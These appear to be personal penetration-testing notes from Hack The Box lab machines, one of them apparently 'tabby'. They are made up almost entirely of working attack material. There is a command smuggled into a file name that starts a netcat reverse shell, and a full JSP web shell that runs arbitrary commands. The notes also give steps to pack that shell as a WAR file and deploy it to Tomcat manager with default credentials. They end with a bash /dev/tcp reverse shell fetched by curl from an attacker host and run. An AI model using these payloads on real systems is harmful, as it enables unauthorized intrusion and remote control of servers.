Shell by file name when the name was seen being used in a command within a script: #touch ';nc -c bash 10.10.14.23 2222;.php' //had to use nc like this because the '/' was acting as an escape in other rshells. Then the Php was just added to get the script to pickup the file in that case (networked htb) WAR file webshell:(can get stuck on rce shell upgrade // try the msfvenom war shell) //from the tennc github #cp /opt/webshell/jsp/cmdjsp.jsp ~/htb/tabby/shell/cmdjsp.jsp //must use the same names"cmdjsp.jsp" for the shell to work //the default one is for windows we need to edit for linux, we also use post since it has more options that get #cd ~/htb/tabby/shell #nano cmdjsp.jsp <FORM METHOD=POST ACTION='cmdjsp.jsp'> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s; } } catch(IOException e) { e.printStackTrace(); } } %> <pre> <%=output %> </pre> #jar -cvf cmdjsp.war * This will pack all the jsp files in the current directory into the war file #curl -T cmdjsp.war -u 'tomcat:s3cret' http://10.10.10.194:8080/manager/text/deploy?path=/squanch //then navigate to http://10.10.10.194:8080/squanch5/cmdjsp.jsp note we are using the jsp extension again. now to get the rshell in the rce we have to use a file method since the shell does not like special characters: write to file shell.sh: bash -i >& /dev/tcp/10.10.14.23/3333 0>&1 then host on 80 and curl the file to disk in the rce field: curl 10.10.14.23:80/shell.sh -o /tmp/shell.sh bash /tmp/shell.sh